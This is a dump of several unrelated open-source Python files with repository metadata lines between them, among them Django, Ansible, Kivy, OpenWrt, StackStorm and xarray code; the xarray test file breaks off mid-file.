| gpl-3.0 | 3,188,231,176,937,157,000 | 27.320988 | 78 | 0.503051 | false |
ubc/edx-platform | common/djangoapps/util/migrations/0002_default_rate_limit_config.py | 102 | 4097 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"""Ensure that rate limiting is enabled by default. """
orm['util.RateLimitConfiguration'].objects.create(enabled=True)
def backwards(self, orm):
pass
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'util.ratelimitconfiguration': {
'Meta': {'object_name': 'RateLimitConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['util']
symmetrical = True
| agpl-3.0 | 1,078,336,367,434,218,000 | 63.015625 | 182 | 0.559678 | false |
undoware/neutron-drive | google_appengine/lib/django_1_2/django/core/files/utils.py | 901 | 1230 | class FileProxyMixin(object):
"""
A mixin class used to forward file methods to an underlaying file
object. The internal file object has to be called "file"::
class FileProxy(FileProxyMixin):
def __init__(self, file):
self.file = file
"""
encoding = property(lambda self: self.file.encoding)
fileno = property(lambda self: self.file.fileno)
flush = property(lambda self: self.file.flush)
isatty = property(lambda self: self.file.isatty)
newlines = property(lambda self: self.file.newlines)
read = property(lambda self: self.file.read)
readinto = property(lambda self: self.file.readinto)
readline = property(lambda self: self.file.readline)
readlines = property(lambda self: self.file.readlines)
seek = property(lambda self: self.file.seek)
softspace = property(lambda self: self.file.softspace)
tell = property(lambda self: self.file.tell)
truncate = property(lambda self: self.file.truncate)
write = property(lambda self: self.file.write)
writelines = property(lambda self: self.file.writelines)
xreadlines = property(lambda self: self.file.xreadlines)
def __iter__(self):
return iter(self.file)
| bsd-3-clause | 7,891,983,164,018,954,000 | 41.413793 | 69 | 0.688618 | false |
noroutine/ansible | lib/ansible/modules/remote_management/oneview/oneview_ethernet_network_facts.py | 125 | 4863 | #!/usr/bin/python
# Copyright (c) 2016-2017 Hewlett Packard Enterprise Development LP
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: oneview_ethernet_network_facts
short_description: Retrieve the facts about one or more of the OneView Ethernet Networks
description:
- Retrieve the facts about one or more of the Ethernet Networks from OneView.
version_added: "2.4"
requirements:
- hpOneView >= 2.0.1
author:
- Felipe Bulsoni (@fgbulsoni)
- Thiago Miotto (@tmiotto)
- Adriane Cardozo (@adriane-cardozo)
options:
name:
description:
- Ethernet Network name.
options:
description:
- "List with options to gather additional facts about an Ethernet Network and related resources.
Options allowed: C(associatedProfiles) and C(associatedUplinkGroups)."
extends_documentation_fragment:
- oneview
- oneview.factsparams
'''
EXAMPLES = '''
- name: Gather facts about all Ethernet Networks
oneview_ethernet_network_facts:
config: /etc/oneview/oneview_config.json
delegate_to: localhost
- debug: var=ethernet_networks
- name: Gather paginated and filtered facts about Ethernet Networks
oneview_ethernet_network_facts:
config: /etc/oneview/oneview_config.json
params:
start: 1
count: 3
sort: 'name:descending'
filter: 'purpose=General'
delegate_to: localhost
- debug: var=ethernet_networks
- name: Gather facts about an Ethernet Network by name
oneview_ethernet_network_facts:
config: /etc/oneview/oneview_config.json
name: Ethernet network name
delegate_to: localhost
- debug: var=ethernet_networks
- name: Gather facts about an Ethernet Network by name with options
oneview_ethernet_network_facts:
config: /etc/oneview/oneview_config.json
name: eth1
options:
- associatedProfiles
- associatedUplinkGroups
delegate_to: localhost
- debug: var=enet_associated_profiles
- debug: var=enet_associated_uplink_groups
'''
RETURN = '''
ethernet_networks:
description: Has all the OneView facts about the Ethernet Networks.
returned: Always, but can be null.
type: dict
enet_associated_profiles:
description: Has all the OneView facts about the profiles which are using the Ethernet network.
returned: When requested, but can be null.
type: dict
enet_associated_uplink_groups:
description: Has all the OneView facts about the uplink sets which are using the Ethernet network.
returned: When requested, but can be null.
type: dict
'''
from ansible.module_utils.oneview import OneViewModuleBase
class EthernetNetworkFactsModule(OneViewModuleBase):
argument_spec = dict(
name=dict(type='str'),
options=dict(type='list'),
params=dict(type='dict')
)
def __init__(self):
super(EthernetNetworkFactsModule, self).__init__(additional_arg_spec=self.argument_spec)
self.resource_client = self.oneview_client.ethernet_networks
def execute_module(self):
ansible_facts = {}
if self.module.params['name']:
ethernet_networks = self.resource_client.get_by('name', self.module.params['name'])
if self.module.params.get('options') and ethernet_networks:
ansible_facts = self.__gather_optional_facts(ethernet_networks[0])
else:
ethernet_networks = self.resource_client.get_all(**self.facts_params)
ansible_facts['ethernet_networks'] = ethernet_networks
return dict(changed=False, ansible_facts=ansible_facts)
def __gather_optional_facts(self, ethernet_network):
ansible_facts = {}
if self.options.get('associatedProfiles'):
ansible_facts['enet_associated_profiles'] = self.__get_associated_profiles(ethernet_network)
if self.options.get('associatedUplinkGroups'):
ansible_facts['enet_associated_uplink_groups'] = self.__get_associated_uplink_groups(ethernet_network)
return ansible_facts
def __get_associated_profiles(self, ethernet_network):
associated_profiles = self.resource_client.get_associated_profiles(ethernet_network['uri'])
return [self.oneview_client.server_profiles.get(x) for x in associated_profiles]
def __get_associated_uplink_groups(self, ethernet_network):
uplink_groups = self.resource_client.get_associated_uplink_groups(ethernet_network['uri'])
return [self.oneview_client.uplink_sets.get(x) for x in uplink_groups]
def main():
EthernetNetworkFactsModule().run()
if __name__ == '__main__':
main()
| gpl-3.0 | 1,764,563,738,703,393,000 | 31.42 | 114 | 0.695455 | false |
manthansharma/kivy | examples/canvas/mesh_manipulation.py | 21 | 3123 | '''
Mesh Manipulation Example
=========================
This demonstrates creating a mesh and using it to deform the texture (the
kivy log). You should see the kivy logo with a five sliders to right.
The sliders change the mesh points' x and y offsets, radius, and a
'wobble' deformation's magnitude and speed.
This example is developed in gabriel's blog post at
http://kivy.org/planet/2014/01/kivy-image-manipulations-with-mesh-and-textures/
'''
from kivy.app import App
from kivy.lang import Builder
from kivy.core.image import Image as CoreImage
from kivy.properties import ListProperty, ObjectProperty, NumericProperty
from kivy.clock import Clock
from kivy.core.window import Window
from math import sin, cos, pi
kv = '''
BoxLayout:
Widget:
canvas:
Color:
rgba: 1, 1, 1, 1
Mesh:
vertices: app.mesh_points
indices: range(len(app.mesh_points) // 4)
texture: app.mesh_texture
mode: 'triangle_fan'
BoxLayout:
orientation: 'vertical'
size_hint_x: None
width: 100
Slider:
value: app.offset_x
on_value: app.offset_x = args[1]
min: -1
max: 1
Slider:
value: app.offset_y
on_value: app.offset_y = args[1]
min: -1
max: 1
Slider:
value: app.radius
on_value: app.radius = args[1]
min: 10
max: 1000
Slider:
value: app.sin_wobble
on_value: app.sin_wobble = args[1]
min: -50
max: 50
Slider:
value: app.sin_wobble_speed
on_value: app.sin_wobble_speed = args[1]
min: 0
max: 50
step: 1
'''
class MeshBallApp(App):
mesh_points = ListProperty([])
mesh_texture = ObjectProperty(None)
radius = NumericProperty(500)
offset_x = NumericProperty(.5)
offset_y = NumericProperty(.5)
sin_wobble = NumericProperty(0)
sin_wobble_speed = NumericProperty(0)
def build(self):
self.mesh_texture = CoreImage('data/logo/kivy-icon-512.png').texture
Clock.schedule_interval(self.update_points, 0)
return Builder.load_string(kv)
def update_points(self, *args):
""" replace self.mesh_points based on current slider positions.
Called continuously by a timer because this only sample code.
"""
points = [Window.width / 2, Window.height / 2, .5, .5]
i = 0
while i < 2 * pi:
i += 0.01 * pi
points.extend([
Window.width / 2 + cos(i) * (self.radius + self.sin_wobble *
sin(i * self.sin_wobble_speed)),
Window.height / 2 + sin(i) * (self.radius + self.sin_wobble *
sin(i * self.sin_wobble_speed)),
self.offset_x + sin(i),
self.offset_y + cos(i)])
self.mesh_points = points
if __name__ == '__main__':
MeshBallApp().run()
| mit | -1,012,396,234,273,629,200 | 29.920792 | 79 | 0.549792 | false |
rnikiforova/GuruTubeProject | GuruTube/libraries/django/contrib/gis/tests/geo3d/models.py | 222 | 2064 | from django.contrib.gis.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class City3D(models.Model):
name = models.CharField(max_length=30)
point = models.PointField(dim=3)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class Interstate2D(models.Model):
name = models.CharField(max_length=30)
line = models.LineStringField(srid=4269)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class Interstate3D(models.Model):
name = models.CharField(max_length=30)
line = models.LineStringField(dim=3, srid=4269)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class InterstateProj2D(models.Model):
name = models.CharField(max_length=30)
line = models.LineStringField(srid=32140)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class InterstateProj3D(models.Model):
name = models.CharField(max_length=30)
line = models.LineStringField(dim=3, srid=32140)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class Polygon2D(models.Model):
name = models.CharField(max_length=30)
poly = models.PolygonField(srid=32140)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class Polygon3D(models.Model):
name = models.CharField(max_length=30)
poly = models.PolygonField(dim=3, srid=32140)
objects = models.GeoManager()
def __str__(self):
return self.name
class Point2D(models.Model):
point = models.PointField()
objects = models.GeoManager()
class Point3D(models.Model):
point = models.PointField(dim=3)
objects = models.GeoManager()
class MultiPoint3D(models.Model):
mpoint = models.MultiPointField(dim=3)
objects = models.GeoManager()
| bsd-3-clause | -8,971,634,107,930,700,000 | 25.805195 | 61 | 0.69719 | false |
boxed/WCS-Hub | wcs-hub/models.py | 1 | 1177 | from google.appengine.ext import db
from google.appengine.api import users
from json import JSONDecoder
class DictModel(db.Model):
def to_dict(self):
decoder = JSONDecoder()
result = dict(
[
(p[:-len('_json')], decoder.decode(getattr(self, p))) if p.endswith('_json') else (p, getattr(self, p))
for p in self.properties()
]
+[('id', unicode(self.key().id()))])
return result
class Event(DictModel):
user = db.UserProperty(auto_current_user_add=True)
name = db.StringProperty(required=True)
description = db.TextProperty()
date = db.DateProperty()
registration_opens = db.DateProperty()
registration_closes = db.DateProperty()
competitions_json = db.TextProperty()
class Registration(DictModel):
# NOTE: the parent object must be an Event instance
user = db.UserProperty(auto_current_user_add=True)
first_name = db.StringProperty(required=True)
last_name = db.StringProperty(required=True)
lead_follow = db.StringProperty(required=True)
competitions_json = db.TextProperty(required=True)
wsdc_number = db.StringProperty() | mit | -4,628,999,772,867,756,000 | 33.647059 | 119 | 0.660153 | false |
jmighion/ansible | lib/ansible/modules/windows/win_user.py | 40 | 6163 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Matt Martz <[email protected]>, and others
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_user
version_added: "1.7"
short_description: Manages local Windows user accounts
description:
- Manages local Windows user accounts
- For non-Windows targets, use the M(user) module instead.
options:
name:
description:
- Name of the user to create, remove or modify.
required: true
fullname:
description:
- Full name of the user
required: false
default: null
version_added: "1.9"
description:
description:
- Description of the user
required: false
default: null
version_added: "1.9"
password:
description:
- Optionally set the user's password to this (plain text) value.
required: false
default: null
update_password:
description:
- C(always) will update passwords if they differ. C(on_create) will
only set the password for newly created users.
required: false
choices: [ 'always', 'on_create' ]
default: always
version_added: "1.9"
password_expired:
description:
- C(yes) will require the user to change their password at next login.
C(no) will clear the expired password flag.
required: false
choices: [ 'yes', 'no' ]
default: null
version_added: "1.9"
password_never_expires:
description:
- C(yes) will set the password to never expire. C(no) will allow the
password to expire.
required: false
choices: [ 'yes', 'no' ]
default: null
version_added: "1.9"
user_cannot_change_password:
description:
- C(yes) will prevent the user from changing their password. C(no) will
allow the user to change their password.
required: false
choices: [ 'yes', 'no' ]
default: null
version_added: "1.9"
account_disabled:
description:
- C(yes) will disable the user account. C(no) will clear the disabled
flag.
required: false
choices: [ 'yes', 'no' ]
default: null
version_added: "1.9"
account_locked:
description:
- C(no) will unlock the user account if locked.
required: false
choices: [ 'no' ]
default: null
version_added: "1.9"
groups:
description:
- Adds or removes the user from this comma-separated lis of groups,
depending on the value of I(groups_action). When I(groups_action) is
C(replace) and I(groups) is set to the empty string ('groups='), the
user is removed from all groups.
required: false
version_added: "1.9"
groups_action:
description:
- If C(replace), the user is added as a member of each group in
I(groups) and removed from any other groups. If C(add), the user is
added to each group in I(groups) where not already a member. If
C(remove), the user is removed from each group in I(groups).
required: false
choices: [ "replace", "add", "remove" ]
default: "replace"
version_added: "1.9"
state:
description:
- When C(present), creates or updates the user account. When C(absent),
removes the user account if it exists. When C(query) (new in 1.9),
retrieves the user account details without making any changes.
required: false
choices:
- present
- absent
- query
default: present
aliases: []
notes:
- For non-Windows targets, use the M(user) module instead.
author:
- "Paul Durivage (@angstwad)"
- "Chris Church (@cchurch)"
'''
EXAMPLES = r'''
- name: Ensure user bob is present
win_user:
name: bob
password: B0bP4ssw0rd
state: present
groups:
- Users
- name: Ensure user bob is absent
win_user:
name: bob
state: absent
'''
RETURN = r'''
account_disabled:
description: Whether the user is disabled.
returned: user exists
type: bool
sample: false
account_locked:
description: Whether the user is locked.
returned: user exists
type: bool
sample: false
description:
description: The description set for the user.
returned: user exists
type: str
sample: Username for test
fullname:
description: The full name set for the user.
returned: user exists
type: str
sample: Test Username
groups:
description: A list of groups and their ADSI path the user is a member of.
returned: user exists
type: list
sample: [
{
"name": "Administrators",
"path": "WinNT://WORKGROUP/USER-PC/Administrators"
}
]
name:
description: The name of the user
returned: always
type: str
sample: username
password_expired:
description: Whether the password is expired.
returned: user exists
type: bool
sample: false
password_never_expires:
description: Whether the password is set to never expire.
returned: user exists
type: bool
sample: true
path:
description: The ADSI path for the user.
returned: user exists
type: str
sample: "WinNT://WORKGROUP/USER-PC/username"
sid:
description: The SID for the user.
returned: user exists
type: str
sample: S-1-5-21-3322259488-2828151810-3939402796-1001
user_cannot_change_password:
description: Whether the user can change their own password.
returned: user exists
type: bool
sample: false
'''
| gpl-3.0 | -4,017,336,175,784,749,600 | 27.141553 | 78 | 0.668019 | false |
nxppru/zydiy | scripts/dl_cleanup.py | 223 | 6094 | #!/usr/bin/env python3
"""
# OpenWrt download directory cleanup utility.
# Delete all but the very last version of the program tarballs.
#
# Copyright (C) 2010-2015 Michael Buesch <[email protected]>
# Copyright (C) 2013-2015 OpenWrt.org
"""
from __future__ import print_function
import sys
import os
import re
import getopt
# Commandline options
opt_dryrun = False
def parseVer_1234(match, filepath):
progname = match.group(1)
progversion = (int(match.group(2)) << 64) |\
(int(match.group(3)) << 48) |\
(int(match.group(4)) << 32) |\
(int(match.group(5)) << 16)
return (progname, progversion)
def parseVer_123(match, filepath):
progname = match.group(1)
try:
patchlevel = match.group(5)
except IndexError as e:
patchlevel = None
if patchlevel:
patchlevel = ord(patchlevel[0])
else:
patchlevel = 0
progversion = (int(match.group(2)) << 64) |\
(int(match.group(3)) << 48) |\
(int(match.group(4)) << 32) |\
patchlevel
return (progname, progversion)
def parseVer_12(match, filepath):
progname = match.group(1)
try:
patchlevel = match.group(4)
except IndexError as e:
patchlevel = None
if patchlevel:
patchlevel = ord(patchlevel[0])
else:
patchlevel = 0
progversion = (int(match.group(2)) << 64) |\
(int(match.group(3)) << 48) |\
patchlevel
return (progname, progversion)
def parseVer_r(match, filepath):
progname = match.group(1)
progversion = (int(match.group(2)) << 64)
return (progname, progversion)
def parseVer_ymd(match, filepath):
progname = match.group(1)
progversion = (int(match.group(2)) << 64) |\
(int(match.group(3)) << 48) |\
(int(match.group(4)) << 32)
return (progname, progversion)
def parseVer_GIT(match, filepath):
progname = match.group(1)
st = os.stat(filepath)
progversion = int(st.st_mtime) << 64
return (progname, progversion)
extensions = (
".tar.gz",
".tar.bz2",
".tar.xz",
".orig.tar.gz",
".orig.tar.bz2",
".orig.tar.xz",
".zip",
".tgz",
".tbz",
".txz",
)
versionRegex = (
(re.compile(r"(.+)[-_](\d+)\.(\d+)\.(\d+)\.(\d+)"), parseVer_1234), # xxx-1.2.3.4
(re.compile(r"(.+)[-_](\d\d\d\d)-?(\d\d)-?(\d\d)"), parseVer_ymd), # xxx-YYYY-MM-DD
(re.compile(r"(.+)[-_]([0-9a-fA-F]{40,40})"), parseVer_GIT), # xxx-GIT_SHASUM
(re.compile(r"(.+)[-_](\d+)\.(\d+)\.(\d+)(\w?)"), parseVer_123), # xxx-1.2.3a
(re.compile(r"(.+)[-_](\d+)_(\d+)_(\d+)"), parseVer_123), # xxx-1_2_3
(re.compile(r"(.+)[-_](\d+)\.(\d+)(\w?)"), parseVer_12), # xxx-1.2a
(re.compile(r"(.+)[-_]r?(\d+)"), parseVer_r), # xxx-r1111
)
blacklist = [
("linux", re.compile(r"linux-\d.*")),
("gcc", re.compile(r"gcc-.*")),
("wl_apsta", re.compile(r"wl_apsta.*")),
(".fw", re.compile(r".*\.fw")),
(".arm", re.compile(r".*\.arm")),
(".bin", re.compile(r".*\.bin")),
("rt-firmware", re.compile(r"RT[\d\w]+_Firmware.*")),
]
class EntryParseError(Exception): pass
class Entry:
def __init__(self, directory, filename):
self.directory = directory
self.filename = filename
self.progname = ""
self.fileext = ""
for ext in extensions:
if filename.endswith(ext):
filename = filename[0:0-len(ext)]
self.fileext = ext
break
else:
print(self.filename, "has an unknown file-extension")
raise EntryParseError("ext")
for (regex, parseVersion) in versionRegex:
match = regex.match(filename)
if match:
(self.progname, self.version) = parseVersion(
match, directory + "/" + filename + self.fileext)
break
else:
print(self.filename, "has an unknown version pattern")
raise EntryParseError("ver")
def getPath(self):
return (self.directory + "/" + self.filename).replace("//", "/")
def deleteFile(self):
path = self.getPath()
print("Deleting", path)
if not opt_dryrun:
os.unlink(path)
def __ge__(self, y):
return self.version >= y.version
def usage():
print("OpenWrt download directory cleanup utility")
print("Usage: " + sys.argv[0] + " [OPTIONS] <path/to/dl>")
print("")
print(" -d|--dry-run Do a dry-run. Don't delete any files")
print(" -B|--show-blacklist Show the blacklist and exit")
print(" -w|--whitelist ITEM Remove ITEM from blacklist")
def main(argv):
global opt_dryrun
try:
(opts, args) = getopt.getopt(argv[1:],
"hdBw:",
[ "help", "dry-run", "show-blacklist", "whitelist=", ])
if len(args) != 1:
usage()
return 1
except getopt.GetoptError as e:
usage()
return 1
directory = args[0]
for (o, v) in opts:
if o in ("-h", "--help"):
usage()
return 0
if o in ("-d", "--dry-run"):
opt_dryrun = True
if o in ("-w", "--whitelist"):
for i in range(0, len(blacklist)):
(name, regex) = blacklist[i]
if name == v:
del blacklist[i]
break
else:
print("Whitelist error: Item", v,\
"is not in blacklist")
return 1
if o in ("-B", "--show-blacklist"):
for (name, regex) in blacklist:
sep = "\t\t"
if len(name) >= 8:
sep = "\t"
print("%s%s(%s)" % (name, sep, regex.pattern))
return 0
# Create a directory listing and parse the file names.
entries = []
for filename in os.listdir(directory):
if filename == "." or filename == "..":
continue
for (name, regex) in blacklist:
if regex.match(filename):
if opt_dryrun:
print(filename, "is blacklisted")
break
else:
try:
entries.append(Entry(directory, filename))
except EntryParseError as e:
pass
# Create a map of programs
progmap = {}
for entry in entries:
if entry.progname in progmap.keys():
progmap[entry.progname].append(entry)
else:
progmap[entry.progname] = [entry,]
# Traverse the program map and delete everything but the last version
for prog in progmap:
lastVersion = None
versions = progmap[prog]
for version in versions:
if lastVersion is None or version >= lastVersion:
lastVersion = version
if lastVersion:
for version in versions:
if version is not lastVersion:
version.deleteFile()
if opt_dryrun:
print("Keeping", lastVersion.getPath())
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
| gpl-2.0 | -4,524,169,905,885,258,000 | 24.71308 | 84 | 0.614375 | false |
mindworker/so-bro | watcher.py | 1 | 1650 | import os
import sys
from select import select
from subprocess import Popen, PIPE
import rpyc
err = ""
def handleInterpreter(conn, fd, data):
global err
if fd == p.stderr.fileno():
datastr = str(data, 'utf8')
if datastr == '>>> ':
return
if 'Type "help", "copyright", "credits" or "license" for more information.' in datastr:
return
err += datastr
# errors seem to always end with >>>
if '>>> ' in datastr:
conn.root.add_err(err)
err = ""
def handleScript(conn, fd, data):
if fd == p.stderr.fileno():
# send to local debug service
conn.root.add_err(str(data, 'utf8'))
def handle(conn, fd, data, mode):
if mode == 'interpreter':
handleInterpreter(conn, fd, data)
else:
handleScript(conn, fd, data)
if __name__ == "__main__":
conn = rpyc.connect("localhost", 18861)
command = ['python']
mode = 'interpreter'
if len(sys.argv) > 1:
command = ['python'] + sys.argv[1:]
mode = 'script'
with Popen(command, stdout=PIPE, stderr=PIPE) as p:
readable = {
p.stdout.fileno(): sys.stdout.buffer,
p.stderr.fileno(): sys.stderr.buffer,
}
while readable:
for fd in select(readable, [], [])[0]:
data = os.read(fd, 1024) # read available
if not data: # EOF
del readable[fd]
continue
readable[fd].write(data)
readable[fd].flush()
handle(conn, fd, data, mode)
| mit | 388,884,385,238,412,700 | 23.626866 | 95 | 0.516364 | false |
pducks32/intergrala | python/sympy/sympy/utilities/tests/test_pytest.py | 105 | 1601 | from sympy.utilities.pytest import raises, USE_PYTEST
if USE_PYTEST:
import py.test
pytestmark = py.test.mark.skipif(USE_PYTEST,
reason=("using py.test"))
# Test callables
def test_expected_exception_is_silent_callable():
def f():
raise ValueError()
raises(ValueError, f)
def test_lack_of_exception_triggers_AssertionError_callable():
try:
raises(Exception, lambda: 1 + 1)
assert False
except AssertionError as e:
assert str(e) == "DID NOT RAISE"
def test_unexpected_exception_is_passed_through_callable():
def f():
raise ValueError("some error message")
try:
raises(TypeError, f)
assert False
except ValueError as e:
assert str(e) == "some error message"
# Test with statement
def test_expected_exception_is_silent_with():
with raises(ValueError):
raise ValueError()
def test_lack_of_exception_triggers_AssertionError_with():
try:
with raises(Exception):
1 + 1
assert False
except AssertionError as e:
assert str(e) == "DID NOT RAISE"
def test_unexpected_exception_is_passed_through_with():
try:
with raises(TypeError):
raise ValueError("some error message")
assert False
except ValueError as e:
assert str(e) == "some error message"
# Now we can use raises() instead of try/catch
# to test that a specific exception class is raised
def test_second_argument_should_be_callable_or_string():
raises(TypeError, lambda: raises("irrelevant", 42))
| mit | 2,815,751,586,308,831,000 | 24.412698 | 62 | 0.642723 | false |
pidah/st2contrib | packs/smartthings/sensors/smartthings_sensor.py | 10 | 2071 | import eventlet
import json
from flask import request, json, Flask, Response # noqa
from st2reactor.sensor.base import Sensor
eventlet.monkey_patch(
os=True,
select=True,
socket=True,
thread=True,
time=True)
class SmartThingsSensor(Sensor):
def __init__(self, sensor_service, config=None):
super(SmartThingsSensor, self).__init__(sensor_service=sensor_service,
config=config)
self._trigger = 'smartthings.event'
self._logger = self._sensor_service.get_logger(__name__)
self._listen_ip = self._config.get('listen_ip', '0.0.0.0')
self._listen_port = self._config.get('listen_port', '12000')
self._api_key = self._config.get('api_key', None)
self._app = Flask(__name__)
def setup(self):
pass
def run(self):
if not self._api_key:
raise Exception('[smartthings_sensor]: api_key config option not set')
# Routes
@self._app.route('/', methods=['PUT'])
def process_incoming():
response = None
if request.headers['X-Api-Key'] == self._api_key:
status = self._process_request(request)
response = Response(status[0], status=status[1])
else:
response = Response('fail', status=401)
return response
# Start the Flask App
self._app.run(host=self._listen_ip, port=self._listen_port)
def cleanup(self):
pass
def add_trigger(self, trigger):
pass
def update_trigger(self, trigger):
pass
def remove_trigger(self, trigger):
pass
def _process_request(self, request):
if request.headers['Content-Type'] == 'application/json':
payload = request.json
self._logger.debug('[smartthings_sensor]: processing request {}'.format(payload))
self._sensor_service.dispatch(trigger=self._trigger, payload=payload)
return ('ok', 200)
else:
return ('fail', 415)
| apache-2.0 | -3,012,116,368,909,634,600 | 28.585714 | 93 | 0.577016 | false |
jhamman/xray | xarray/tests/test_variable.py | 1 | 54048 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
from copy import copy, deepcopy
from datetime import datetime, timedelta
from textwrap import dedent
import pytest
from distutils.version import LooseVersion
import numpy as np
import pytz
import pandas as pd
from xarray import Variable, IndexVariable, Coordinate, Dataset
from xarray.core import indexing
from xarray.core.variable import as_variable, as_compatible_data
from xarray.core.indexing import PandasIndexAdapter, LazilyIndexedArray
from xarray.core.pycompat import PY3, OrderedDict
from xarray.core.common import full_like, zeros_like, ones_like
from . import TestCase, source_ndarray, requires_dask
class VariableSubclassTestCases(object):
def test_properties(self):
data = 0.5 * np.arange(10)
v = self.cls(['time'], data, {'foo': 'bar'})
self.assertEqual(v.dims, ('time',))
self.assertArrayEqual(v.values, data)
self.assertEqual(v.dtype, float)
self.assertEqual(v.shape, (10,))
self.assertEqual(v.size, 10)
self.assertEqual(v.sizes, {'time': 10})
self.assertEqual(v.nbytes, 80)
self.assertEqual(v.ndim, 1)
self.assertEqual(len(v), 10)
self.assertEqual(v.attrs, {'foo': u'bar'})
def test_attrs(self):
v = self.cls(['time'], 0.5 * np.arange(10))
self.assertEqual(v.attrs, {})
attrs = {'foo': 'bar'}
v.attrs = attrs
self.assertEqual(v.attrs, attrs)
self.assertIsInstance(v.attrs, OrderedDict)
v.attrs['foo'] = 'baz'
self.assertEqual(v.attrs['foo'], 'baz')
def test_getitem_dict(self):
v = self.cls(['x'], np.random.randn(5))
actual = v[{'x': 0}]
expected = v[0]
self.assertVariableIdentical(expected, actual)
def _assertIndexedLikeNDArray(self, variable, expected_value0,
expected_dtype=None):
"""Given a 1-dimensional variable, verify that the variable is indexed
like a numpy.ndarray.
"""
self.assertEqual(variable[0].shape, ())
self.assertEqual(variable[0].ndim, 0)
self.assertEqual(variable[0].size, 1)
# test identity
self.assertTrue(variable.equals(variable.copy()))
self.assertTrue(variable.identical(variable.copy()))
# check value is equal for both ndarray and Variable
self.assertEqual(variable.values[0], expected_value0)
self.assertEqual(variable[0].values, expected_value0)
# check type or dtype is consistent for both ndarray and Variable
if expected_dtype is None:
# check output type instead of array dtype
self.assertEqual(type(variable.values[0]), type(expected_value0))
self.assertEqual(type(variable[0].values), type(expected_value0))
elif expected_dtype is not False:
self.assertEqual(variable.values[0].dtype, expected_dtype)
self.assertEqual(variable[0].values.dtype, expected_dtype)
def test_index_0d_int(self):
for value, dtype in [(0, np.int_),
(np.int32(0), np.int32)]:
x = self.cls(['x'], [value])
self._assertIndexedLikeNDArray(x, value, dtype)
def test_index_0d_float(self):
for value, dtype in [(0.5, np.float_),
(np.float32(0.5), np.float32)]:
x = self.cls(['x'], [value])
self._assertIndexedLikeNDArray(x, value, dtype)
